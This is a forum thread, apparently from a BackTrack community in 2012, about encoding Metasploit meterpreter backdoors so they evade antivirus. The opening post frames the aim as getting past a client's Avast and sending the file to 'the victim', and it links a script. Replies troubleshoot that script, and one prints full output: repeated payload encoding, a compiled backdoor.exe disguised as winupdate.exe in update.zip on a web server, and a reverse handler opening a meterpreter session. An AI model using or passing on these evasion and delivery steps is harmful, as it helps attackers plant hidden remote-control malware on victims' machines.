Results 1 to 7 of 7

Thread: Undetectable Backdoor Encoding with Metasploit Framework

  1. #1
    Just burned his ISO deathcorps's Avatar
    Join Date
    Dec 2010
    Posts
    12

    Default Undetectable Backdoor Encoding with Metasploit Framework

    Today we are gonna be encoding backdoors using metasploit framwork on Backtrack 5!

    First we take a look at crafting a simple payload into a backdoor, and when loading it into a sandbox (Windows XP) the anti-virus doesn’t even allow the file to be downloaded.

    Well, that’s not any good is it? Who’s gonna open the file if there are flags all over it?

    So we have to make this file undetectable, at least to the client’s anti-virus which is Avast. Recently I found a public script in Pastebin and after looking at it for a few minutes, I thought the file was really legit. Especially after seeing all the encoding going on at line 43… so I modified it for my own use — big ups to Astrobaby, don’t know who you are or where you’re from but keep it up!

    Run metasploit framework console, use the exploit/multi/handler method, and set the payload to windows/meterpreter/reverse_https. It is also a good idea to use the ‘launch_and_migrate.rb’ script, so we can migrate to a new process as soon as we get a chance. We encoded that backdoor like 1000 times so it can’t be that stable.

    Now with an undetectable backdoor we just get creative and find a way to send it to the victim.

    Video & Article: http://technicdynamic.com/2012/02/un...oit-framework/

    Script download: http://technicdynamic.com/wp-content...02/scripts.zip

  2. #2
    Member m0j4h3d's Avatar
    Join Date
    Jan 2010
    Posts
    84

    Default Re: Undetectable Backdoor Encoding with Metasploit Framework

    .. great post man
    but what about this:

    mv: cannot stat `final.exe': No such file or directory
    final.c ...generated in seclabs subfolder
    final.c sha1checksum is .. 1906ae3935857cb5f84606462f308cabb606fe51 final.c
    strip:final.c: File format not recognized
    starting the meterpreter listener...
    Done! Now launch msfconsole > exploit/multi/handler

    !!!!!
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  3. #3
    Just burned his ISO deathcorps's Avatar
    Join Date
    Dec 2010
    Posts
    12

    Default Re: Undetectable Backdoor Encoding with Metasploit Framework

    Yea, sorry about that! Forgot to mention you have to install these libs:

    apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

    Try it then

  4. #4
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    4

    Default Re: Undetectable Backdoor Encoding with Metasploit Framework

    11 / 42 Detect ratin AV :-((
    It's not gud.
    How it change to have very nice tools ?

  5. #5
    Just burned his ISO Manijak's Avatar
    Join Date
    Feb 2010
    Location
    Serbia
    Posts
    7

    Default Re: Undetectable Backdoor Encoding with Metasploit Framework

    Same problem as m0j4h3d.


    root@bt:/pentest/exploits/framework2# ./vanish.sh
    ************************************************** **********
    Fully Undetectable Metasploit Payload generaor Beta
    Original Concept and Script by Astr0baby
    Stable Version of Script is Edited by Vanish3r
    Video Tutorial by Vanish3r - www.securitylabs.in
    Powered by TheHackerNews.com and securitylabs.in
    ************************************************** **********
    Network Device On your Computer :
    lo:
    eth1:
    Which Interface to use ? eth1
    What Port Number are we gonna listen to? : 4444
    Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 5000
    How many times you want to encode ? 1-20 : 10
    Current Ip is : 192.168.227.128
    Unknown option: c
    Unknown option: c
    Unknown option: c
    Unknown option: c[*] Invalid encoder specified[*] Invalid encoder specified[*] Invalid encoder specified[*] Invalid encoder specified

    Usage: ./msfpayload <payload> [var=val] <S|C|P|R|X>

    Payloads:
    bsd_ia32_bind BSD IA32 Bind Shell
    bsd_ia32_bind_stg BSD IA32 Staged Bind Shell
    bsd_ia32_exec BSD IA32 Execute Command
    bsd_ia32_findrecv BSD IA32 Recv Tag Findsock Shell
    .
    .
    .
    mv: cannot stat `final.exe': No such file or directory
    final.c ...generated in seclabs subfolder
    final.c sha1checksum is .. 415f379b763391d4daa56459c68d2ff19e611b5e final.c
    strip:final.c: File format not recognized
    starting the meterpreter listener...
    Done! Now launch msfconsole > exploit/multi/handler
    and installed
    apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

    Anyone have suggestion? Running BT5R2 Gnome 32.

  6. #6
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Undetectable Backdoor Encoding with Metasploit Framework

    hi,manijak
    the script worked fine! i'm use bt5-r2 too...if you have installed (todos migw32..ecc)try to copy vanish.sh in metasploit 4.3.0-dev directory!
    /opt/metasploit/msf3 or create link then me /pentest/exploit/framework

    oot@bt:~# cd /pentest/exploits/framework
    root@bt:/pentest/exploits/framework# ls
    armitage javaAttack.sh msfd msfpescan nul test
    crypter.py lib msfelfscan msfrop plugins tools
    data modules msfencode msfrpc README vanish.sh
    documentation msfbinscan msfgui msfrpcd scripts
    external msfcli msfmachscan msfupdate seclabs
    HACKING msfconsole msfpayload msfvenom structure.c
    root@bt:/pentest/exploits/framework# ./vanish.sh
    # Automated Backdoor & Exploitation by astr0baby, vanish3r & deathc0rps
    * Enter IP/DNS address: 192.168.1.122
    * Enter port number: 4444
    > Now, type a random number from 1~100000 for encoding purposes. DON'T SKIP!
    * Enter random seed: 6000
    * Encode how many times? [1-20]: 5
    > Creating payload and encoding...[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
    [*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
    [*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
    [*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
    [*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
    [*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
    [*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
    [*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
    [*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
    [*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

    > Payload created.
    > Creating directory seclabs...
    > Encoding and compiling, this might take a while...
    backdoor.exe > ...finished compiling to folder: seclabs/
    backdoor.exe > sha1checksum is... 77b8421777dd3e72fe724b01929e5a726483e8e0 backdoor.exe
    > Copying the file to /var/www/ and creating update.zip
    adding: winupdate.exe (deflated 52%)

    NOW START APACHE2 SERVER & THE LISTENER....
    root@bt:/pentest/exploits/framework#/etc/init.d/apache2 start
    root@bt:/pentest/exploits/framework# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.122 E
    (in the script is ##uncomment)
    REDIRECT "VICTIM ON ""ATTACKER_WEB_SERVER"........................ ...& down/execute[*] Please wait while we load the module tree...
    =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
    + -- --=[ 823 exploits - 467 auxiliary - 141 post
    + -- --=[ 250 payloads - 27 encoders - 8 nops
    =[ svn r15075 updated yesterday (2012.04.06)

    PAYLOAD => windows/meterpreter/reverse_tcp
    LPORT => 4444
    LHOST => 192.168.1.122[*] Started reverse handler on 192.168.1.122:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 192.168.1.4[*] Meterpreter session 1 opened (192.168.1.122:4444 -> 192.168.1.4:1523) at 2012-04-08 11:46:30 +0200

    meterpreter > )
    MORE AV DETECT THIS!!!!!!!!bye

  7. #7
    Just burned his ISO killtrace's Avatar
    Join Date
    May 2012
    Posts
    4

    Default Re: Undetectable Backdoor Encoding with Metasploit Framework

    ok I go cd /pentest/exploits/framework2 (yes name of my folder is framework2 o.0) >ls> I can see vanish.sh I made it executable > ./vanish > interface:etho1 >port:4444 > random number 6000 > encode 5 > and same thing as manijak


    mv: cannot stat `final.exe': No such file or directory
    final.c ...generated in seclabs subfolder
    final.c sha1checksum is .. ed36ca59436649e3d5516ee0a96c95ecbcf77a5e final.c
    strip:final.c: File format not recognized
    starting the meterpreter listener...
    Done! Now launch msfconsole > exploit/multi/handler

    and I have install all mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils and still I got this
    I use backtrack 5 r2 gnome x64

Similar Threads

  1. Metasploit encoding
    By SecureSurfer in forum Beginners Forum
    Replies: 7
    Last Post: 01-07-2011, 10:42 AM
  2. [metasploit] - Backdoor - erro/dúvida
    By J4rll3y in forum Suporte Software
    Replies: 10
    Last Post: 08-07-2010, 07:03 PM
  3. Creating and encoding a Metasploit meterpreter payload
    By TAPE in forum BackTrack Videos
    Replies: 0
    Last Post: 06-12-2010, 12:27 AM
  4. Metasploit Framework
    By homerJofBT4 in forum OLD Newbie Area
    Replies: 2
    Last Post: 03-01-2010, 04:00 PM
  5. Ettercap/Metasploit and netcat for backdoor
    By overide in forum OLD Tutorials and Guides
    Replies: 3
    Last Post: 10-03-2008, 02:54 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •